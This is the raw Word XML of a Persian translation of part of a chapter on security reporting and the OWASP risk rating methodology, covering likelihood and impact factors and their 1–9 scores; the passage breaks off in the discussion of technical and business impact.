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F4413B" w14:textId="77777777" w:rsidR="00977F11" w:rsidRPr="003D0575" w:rsidRDefault="003D0575" w:rsidP="00B05409">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r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۵</w:t>
      </w:r>
      <w:r w:rsidR="00B05409"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 w:rsidR="0087583F" w:rsidRPr="003D0575">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B05409"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نوشتن گزارش</w:t>
      </w:r>
      <w:r w:rsidR="00A85481"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: ارزش خطر واقعی را دریاب</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04773ED7" w14:textId="77777777" w:rsidR="00B05409" w:rsidRDefault="00B05409" w:rsidP="008912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این فصل</w:t>
      </w:r>
      <w:r w:rsidR="00A8548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توضیح می</w:t>
      </w:r>
      <w:r w:rsidR="004C102E"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="00A85481">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>دهد که چطور ارزش خطر واقعی</w:t>
      </w:r>
      <w:r w:rsidR="004C102E"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را</w:t>
      </w:r>
      <w:r w:rsidR="00A8548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در نتیجه ی ارزیابی امنیتی دریابیم. ایده این است که یک </w:t>
      </w:r>
      <w:r w:rsidR="0087583F">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>متودولوژی کلی برای شکستن امنیت و ارزیابی خطرها با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هدف اولویت بندی و مدیریت آنها</w:t>
      </w:r>
      <w:r w:rsidR="0087583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بدست آوریم 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>. این</w:t>
      </w:r>
      <w:r w:rsidR="00D92340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یک جدول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87583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به سادگی اسنپ شات ها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 ارزیابی </w:t>
      </w:r>
      <w:r w:rsidR="0087583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 همچنین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رساندن اطلاعات فنی به کاربر نشان می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>دهد، سپس مهم این است که خلاصه ی اجرایی برای مدیریت نمایش داده شود.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB27FBD" w14:textId="77777777" w:rsidR="0089126A" w:rsidRDefault="0089126A" w:rsidP="008912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73DB7A5B" w14:textId="77777777" w:rsidR="0089126A" w:rsidRPr="003D0575" w:rsidRDefault="003D0575" w:rsidP="0089126A">
      <w:pPr>
        <w:bidi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۵.۱ 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 w:rsidR="0089126A"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چطور ارزش خطر واقعی را دریابیم</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F1E946" w14:textId="77777777" w:rsidR="0089126A" w:rsidRPr="004856EC" w:rsidRDefault="0089126A" w:rsidP="0089126A">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004856EC">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">متودولوژی ارزیابی خطر </w:t>
      </w:r>
      <w:r w:rsidRPr="004856EC">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r w:rsidR="004856EC" w:rsidRPr="004856EC">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8EF1C7" w14:textId="77777777" w:rsidR="004856EC" w:rsidRDefault="004C102E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کشف آسیب پذیری مهم است، ولی به همان اندازه مهم</w:t>
      </w:r>
      <w:r w:rsidR="00BF243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توانایی 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>برآورد کردن</w:t>
      </w:r>
      <w:r w:rsidR="00BF243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خطر وابسته به سازمان است.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE46D8" w14:textId="77777777" w:rsidR="00BF2432" w:rsidRDefault="00BF2432" w:rsidP="00D92340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در اوایل چرخه ی حیات، شما ممکن است نگرانی های امنیتی را در معماری یا طراحی توسط استفاده از </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2432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مدل تهدید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تشخیص دهید.</w:t>
      </w:r>
      <w:r w:rsidR="00E2205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در ادامه، شما ممکن است مسائل امنیتی را توسط </w:t>
      </w:r>
      <w:r w:rsidR="00E22051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 xml:space="preserve">بازبینی کد </w:t>
      </w:r>
      <w:r w:rsidR="00E2205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یا </w:t>
      </w:r>
      <w:r w:rsidR="00E22051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تست نفوذ</w:t>
      </w:r>
      <w:r w:rsidR="00E2205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پیدا کنید. یا ممکن است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مشکلات را پیدا نکنید</w:t>
      </w:r>
      <w:r w:rsidR="00D9234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="00E22051">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>تا زمانی که شما اپلیکیشن خود به بازار نداده اید و کسی آنرا هک نکرده باشد.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6450A781" w14:textId="77777777" w:rsidR="00D308ED" w:rsidRDefault="00D92340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با دنبال کردن این رویکردها، شما قادر خواهید بود مهلک بودن این خطرات در کسب و کار خودتان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برآورد کنید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و یک تصمیم آگاهانه درباره ی اینکه با آنها چه کنید بگیرید .</w:t>
      </w:r>
      <w:r w:rsidR="00E611A5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داشتن سیستمی که</w:t>
      </w:r>
      <w:r w:rsidR="00E86BE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همان لحظه خطرات را ارزیابی کند باعث صرفه جویی در زمان و بحث در مورد اولویت ها میشود. این سیستم کمک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86BE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کند که </w:t>
      </w:r>
      <w:r w:rsidR="00D308E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شما </w:t>
      </w:r>
      <w:r w:rsidR="00E86BE2">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>اطمینان حاصل کنید که حواستان پرت خطرات کوچک نشود در حالی که خطرات بزرگی که درک درستی از آن ندارید</w:t>
      </w:r>
      <w:r w:rsidR="00D308E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نادیده گرفته شوند.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0536F44E" w14:textId="77777777" w:rsidR="00D92340" w:rsidRDefault="00D308ED" w:rsidP="00EF2A4B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به صورت ایده آل، سسیتم ارزیابی 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>ریسکی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خواهد بود که به صورت دقیق همه ی خطرات سازمان را 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>برآورد کند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. ولی یک آسیب پذیری ای که برای یک سازمان مهم است ممکن است برای دیگری نباشد. بنابراین ما یک فریمورک پایه ارائه می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دهیم که شما باید برای سازمان خودتان آن را سفارشی کنید.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28471227" w14:textId="77777777" w:rsidR="00D308ED" w:rsidRDefault="00D308ED" w:rsidP="00D308E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ما کار سخت کردیم تا این مدل را به سادگی تمام</w:t>
      </w:r>
      <w:r w:rsidR="00226556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برای استفاده آماده کنیم در حالی که جزئیات کافی برای حدس دقیق خطرات نیز نگه داشته ایم.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49903663" w14:textId="77777777" w:rsidR="00226556" w:rsidRDefault="00226556" w:rsidP="0022655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3C835419" w14:textId="77777777" w:rsidR="00226556" w:rsidRDefault="00226556" w:rsidP="00226556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226556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lastRenderedPageBreak/>
        <w:t>رویکرد</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153E1EA6" w14:textId="77777777" w:rsidR="00226556" w:rsidRDefault="00C87C6E" w:rsidP="00226556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رویکرد های زیادی برای ارزیابی خطر وجود دارد. قسمت منابع در پایین،  تعدادی از رایج ترین آنهارا ببینید.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2A786F" w14:textId="77777777" w:rsidR="00C87C6E" w:rsidRDefault="00C87C6E" w:rsidP="00C87C6E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رویکرد </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP </w:t>
      </w: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نشان داده شده در اینجا بر اساس متودولوژی استاندارد است و برای امنیت اپلیکیشن ها سفارشی شده.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775B01A7" w14:textId="77777777" w:rsidR="00C87C6E" w:rsidRDefault="00C87C6E" w:rsidP="00C87C6E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</w:p>
    <w:p w14:paraId="795B60DF" w14:textId="77777777" w:rsidR="00C87C6E" w:rsidRDefault="00C87C6E" w:rsidP="00C87C6E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با مدل استاندارد خطر شروع می</w:t>
      </w:r>
      <w:r w:rsidR="007B6E30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کنیم :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A038EF" w14:textId="77777777" w:rsidR="00C87C6E" w:rsidRPr="00C87C6E" w:rsidRDefault="00C87C6E" w:rsidP="00C87C6E">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift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C87C6E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>خطر = احتمالات * تاثیر</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB4EE49" w14:textId="77777777" w:rsidR="00C87C6E" w:rsidRDefault="002561D4" w:rsidP="00C87C6E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در قسمت زیر ما عوامل "احتمالات" و "تاثیر"  برای امنیت اپلیکیشن ها جدا کردیم و نشان دادیم که چگونه آنها را ترکیب کنید تا میزان مهلک بودن خطر را تعیین کنید.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A26289B" w14:textId="77777777" w:rsidR="00C87C6E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1 :  خطر را شناسایی کنید</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F0A417" w14:textId="77777777" w:rsidR="002561D4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2 : عوامل برای حدس احتمالات</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3E1C5" w14:textId="77777777" w:rsidR="002561D4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3 : عوامل برای تخمین تاثیرت کسب و کار</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71890D1E" w14:textId="77777777" w:rsidR="002561D4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قدم 4: </w:t>
      </w:r>
      <w:r w:rsidR="00CA6958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تعیین کردن مهلک بودن خطر</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C92DD6" w14:textId="77777777" w:rsidR="002561D4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5 :</w:t>
      </w:r>
      <w:r w:rsidR="009355EA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تص</w:t>
      </w:r>
      <w:r w:rsidR="00CA6958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میم برای اینکه چه</w:t>
      </w:r>
      <w:r w:rsidR="00F12DAF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چیزی</w:t>
      </w:r>
      <w:r w:rsidR="00CA6958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را درست کنید</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF040FD" w14:textId="77777777" w:rsidR="002561D4" w:rsidRDefault="002561D4" w:rsidP="00082C81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6 :</w:t>
      </w:r>
      <w:r w:rsidR="00F12DAF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سفارشی کردن مدل ارزیابی </w:t>
      </w:r>
      <w:r w:rsidR="00082C81" w:rsidRPr="00082C81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خطر </w:t>
      </w:r>
      <w:r w:rsidR="00F12DAF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خودتان</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9E002" w14:textId="77777777" w:rsidR="002561D4" w:rsidRDefault="002561D4" w:rsidP="00F12DAF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</w:p>
    <w:p w14:paraId="11138C1D" w14:textId="77777777" w:rsidR="00F12DAF" w:rsidRPr="00F12DAF" w:rsidRDefault="00F12DAF" w:rsidP="00F12DAF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lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12DAF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قدم 1 :  خطر را شناسایی کنید</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F2F0C7" w14:textId="77777777" w:rsidR="00C87C6E" w:rsidRDefault="00F12DAF" w:rsidP="00C87C6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قدم اول شناسایی خطر است که باید رتبه بندی شود . شما باید در مورد </w:t>
      </w:r>
      <w:r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عامل تهدید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موردنظر، </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12DAF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حمله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هایی که استفاده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کنند،</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12DAF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 xml:space="preserve"> آسیب پذیری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های درگیر و  تاثیر یک حمله ی موفق به سازمانتان  اطلاعات جمع آوری کنید .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440BDDA1" w14:textId="77777777" w:rsidR="008822F0" w:rsidRDefault="004C102E" w:rsidP="00EF2A4B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گروه های حمله کننده</w:t>
      </w:r>
      <w:r w:rsidR="008822F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یا حتی تاثیرات متنوعی روی سازمان ها میتوانند وجود داشته باشند . در صورت کلی بهتر است در جانب احتیاط با بدترین حالت ممکن اشتباه کنیم که ببینیم نتیجه ی بدترین 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>خطر</w:t>
      </w:r>
      <w:r w:rsidR="008822F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ممکن چیست.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16425371" w14:textId="77777777" w:rsidR="008822F0" w:rsidRDefault="008822F0" w:rsidP="008822F0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0987C363" w14:textId="77777777" w:rsidR="008822F0" w:rsidRPr="008822F0" w:rsidRDefault="008822F0" w:rsidP="008822F0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8822F0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lastRenderedPageBreak/>
        <w:t>قدم 2 : عوامل برای حدس احتمالات</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F5C52" w14:textId="77777777" w:rsidR="008822F0" w:rsidRDefault="005963D0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زمانی که خطر بالقوه را شناسایی کردید و میخواهید ببینید که چقدر جدی است،</w:t>
      </w:r>
      <w:r w:rsidR="00360609"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="0036060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اولین قدم حدس زدن احتمالات در بالاترین حد ممکن است، این یک اندازه گیری سخت که چقدر احتمال دارد این آسیب پذیری کشف شود و توسط یک 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>مهاجم</w:t>
      </w:r>
      <w:r w:rsidR="0036060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هک شود . نیازی نیست ما بیش از اندازه  در حدس زدن دقیق باشیم. در صورت کلی شناسایی اینکه</w:t>
      </w:r>
      <w:r w:rsidR="0085183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احتم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ال خطر پایین، متوسط یا بالا است</w:t>
      </w:r>
      <w:r w:rsidR="0085183F">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>، کافیست.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6587D6" w14:textId="77777777" w:rsidR="0085183F" w:rsidRDefault="0085183F" w:rsidP="0085183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7B18F29B" w14:textId="77777777" w:rsidR="0085183F" w:rsidRDefault="0085183F" w:rsidP="008C6CE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برای متوجه شدن این موضوع عواملی وجود دارد . اولین مجموعه ی </w:t>
      </w:r>
      <w:r w:rsidR="008C6CE1">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>آن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به </w:t>
      </w:r>
      <w:r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عامل تهدید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درگیر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مرتبط است. هدف</w:t>
      </w:r>
      <w:r w:rsidR="00723F1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تخمین زدن احتمال یک حمله ی موفق توسط یک گروه مهاجم است . لازم به ذکر است که عوامل گوناگونی میتوانند باعث نفوذ به یک آسیب پذیری شوند، پس معمولا بهتر است از بدترین سناریو استفاده</w:t>
      </w:r>
      <w:r w:rsidR="003D5367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کنیم. برای مثال، یک شخص خودی اح</w:t>
      </w:r>
      <w:r w:rsidR="00723F1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تمال مهاجم بودنش بیشتر است تا یک شخصی ار بیرون </w:t>
      </w:r>
      <w:r w:rsidR="00723F19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="00723F1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ولی به عواملی بستگی دارد.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07202AA9" w14:textId="77777777" w:rsidR="00453802" w:rsidRDefault="00453802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53802">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>توجه داشته باش</w:t>
      </w:r>
      <w:r w:rsidRPr="00453802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53802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453802">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> که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هر عامل مجموعه گزینه هایی دارد، هر گزینه یک امتیاز احتمال بین 1 تا 9 دارد. از این عددها بعداً برای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برآورد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کلی</w:t>
      </w:r>
      <w:r w:rsidR="00C15F57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احتمال استفاده میشود.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78113CBB" w14:textId="77777777" w:rsidR="00C15F57" w:rsidRDefault="00C15F57" w:rsidP="00C15F5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اولین مجموعه ی عوامل به </w:t>
      </w:r>
      <w:r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عامل تهدید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درگیر، وابسته است. هدف در اینجا حدس احتمال یک حمله ی موفق توسط این گروه مهاجمین است. بدترین حالت عامل تهدید را در نظر بگیر.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4853B9A2" w14:textId="77777777" w:rsidR="00563843" w:rsidRDefault="00563843" w:rsidP="00C15F5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4F0564AD" w14:textId="77777777" w:rsidR="00C15F57" w:rsidRDefault="00C15F57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سطح مهارت</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF41F1C" w14:textId="77777777" w:rsidR="00C15F57" w:rsidRDefault="00C15F57" w:rsidP="00C15F5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این مهاجمین از نظر فنی چقدر مهارت دارند ؟ هیچ مهارت فنی (1)، کمی مهارت فنی (3)، کاربر حرفه ای کامپیوتر</w:t>
      </w:r>
      <w:r w:rsidR="00563843">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>(4)، مهارت های برنامه نویسی و شبکه ای(6)، مهارت های تست نفوذ(9) .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5A3BFA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0CBBD89D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انگیزه</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D71BD01" w14:textId="77777777" w:rsidR="00BF236C" w:rsidRDefault="00563843" w:rsidP="00BF236C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چقدر این </w:t>
      </w:r>
      <w:r w:rsidR="006635D8">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>گروه مهاجم</w:t>
      </w:r>
      <w:r w:rsidR="00BF236C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انگیزه دارند که یک آسیب پذیری پیدا کنند و از آن طریق نفوذ کنند ؟ کم یا هیچ (1)، احتمال دستیافتن (4)،  دستیابی بالا (9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6C8B28" w14:textId="77777777" w:rsidR="00BF236C" w:rsidRDefault="00BF236C" w:rsidP="00BF236C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7223556B" w14:textId="77777777" w:rsidR="00BF236C" w:rsidRDefault="00BF236C" w:rsidP="00BF236C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lastRenderedPageBreak/>
        <w:t>شانس</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5090EC8C" w14:textId="77777777" w:rsidR="00BF236C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چقدر این گروه مهاجم شانس دارند که یک آسیب پذیری پیدا کنند و از آن طریق نفوذ ک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نند ؟ هیچ دسترسی شناخته شده (0)، دسترسی محدود(4)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دسترسی کامل (9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF884E" w14:textId="77777777" w:rsidR="0055516A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4EAD032F" w14:textId="77777777" w:rsidR="0055516A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اندازه</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5FFCA9" w14:textId="77777777" w:rsidR="0055516A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این گروه مهاجمین چقدر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بزرگ هستند ؟  توسعه دهندگان (2)، مدیران سیستم (2)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کا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ربران اینترنت (4) ، همکاران (5)، کاربران احراز هویت شده (6)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کاربران ناشناس اینترنت (9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236CD063" w14:textId="77777777" w:rsidR="0055516A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20833C82" w14:textId="77777777" w:rsidR="0055516A" w:rsidRPr="0055516A" w:rsidRDefault="0055516A" w:rsidP="0055516A">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0055516A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عوامل</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> آسیب پذیری</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B51932" w14:textId="77777777" w:rsidR="00B33E66" w:rsidRDefault="0055516A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مجموعه عوامل بعدی به آسیب پذیری های درگیر مرتبط هستند.</w:t>
      </w:r>
      <w:r w:rsidR="006E6A5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هدف در اینجا حدس زدن احتمال پیدا شدن یک آسیب پذیری خاص و نفوذ توسط آن است . فرض کنید</w:t>
      </w:r>
      <w:r w:rsidR="00B33E66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عامل تهدید در بالا انتخاب شده .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F94886D" w14:textId="77777777"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3042A1B4" w14:textId="77777777"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سهولت در پیدا شدن</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074243A5" w14:textId="77777777"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چقدر برای گروه مهاجمین پیدا کردن آسیب پذی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ری ساده است ؟ عملا غیر ممکن (1)، سخت (3)، راحت (7)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ابزار های اتوماتیکش هست  (9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1429CED6" w14:textId="77777777"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22F09C92" w14:textId="77777777"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سهولت در نفوذ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B342B1" w14:textId="77777777"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چقدر برای گروه مهاجمین پیدا کردن نفوذ توسط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آسیب پذیری ساده است ؟ تئوری (1)، سخت (3)، راحت (5)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ابزار های اتوماتیکش هست  (9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1235E1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48A9A758" w14:textId="77777777" w:rsidR="00563843" w:rsidRDefault="00D64361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اطلاع داشتن</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F85B40F" w14:textId="77777777" w:rsidR="00D64361" w:rsidRDefault="00D64361" w:rsidP="00D6436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چقدر این آسیب پذیری برای گروه مهاجمی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ن شناخته شده است ؟ ناشناخته (1)، مخفی (4)، واضح (6)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همه می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دانند (9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37597C2A" w14:textId="77777777" w:rsidR="00D64361" w:rsidRDefault="00D64361" w:rsidP="00D6436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lastRenderedPageBreak/>
        <w:t>تشخیص نفوذ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD337E" w14:textId="77777777" w:rsidR="00D64361" w:rsidRDefault="00D64361" w:rsidP="00D6436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چقدر امکانش هست که نفوذ شناسایی ش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ود ؟ تشخیص فعال در اپلیکیشن (1)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وارد شده و بررسی شده (3)، وارد شده بدون بررسی (8)</w:t>
      </w:r>
      <w:r w:rsidR="00787459">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>، بدون وارد شدن (9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AD599D" w14:textId="77777777" w:rsidR="00787459" w:rsidRDefault="00787459" w:rsidP="0078745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5F53CB27" w14:textId="77777777" w:rsidR="00787459" w:rsidRDefault="00787459" w:rsidP="00227F56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8822F0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قدم </w:t>
      </w:r>
      <w:r w:rsidR="00227F56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3</w:t>
      </w:r>
      <w:r w:rsidRPr="008822F0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 : عوامل برای حدس </w:t>
      </w:r>
      <w:r w:rsidR="00227F56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تاثیر</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA57F52" w14:textId="77777777" w:rsidR="00227F56" w:rsidRDefault="00B23932" w:rsidP="00227F5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وقتی تاثیر یک حمله ی موفق را در نظر بگیریم، مهم است که درک کنیم دو مدل تاثیر به همراه دارد. اولی "تاثیر فنی" رو اپلیکیشن، داده ای که استفاده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کند و تابعی که در اختیار میگذارد. بعدی "تاثیر کسب و کار" است که روی کسب و کار شرکت و عملکرد اپلیکیشن تاثیر میگذارد.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641232B2" w14:textId="77777777" w:rsidR="00B23932" w:rsidRDefault="00B23932" w:rsidP="00C94CA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در نهایت، تاثیر کسب و کار مهمتر است. با این حال، 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>شما ممکن است به تمام اطلاعات مورد ن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تشخ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ص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عواقب تجار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94CAE">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>نفوذ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موفق دسترس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نداشته باش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C94CA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در این صورت، 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>ارائه جزئ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به طور کامل در مورد ر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باعث م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شود نما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نده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تجار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مناسب در مورد </w:t>
      </w:r>
      <w:r w:rsidR="00C94CAE">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>خطر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تصم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کند</w:t>
      </w:r>
      <w:r w:rsidR="00C94CAE">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292FC290" w14:textId="77777777" w:rsidR="00C94CAE" w:rsidRDefault="00C94CAE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C94CAE">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
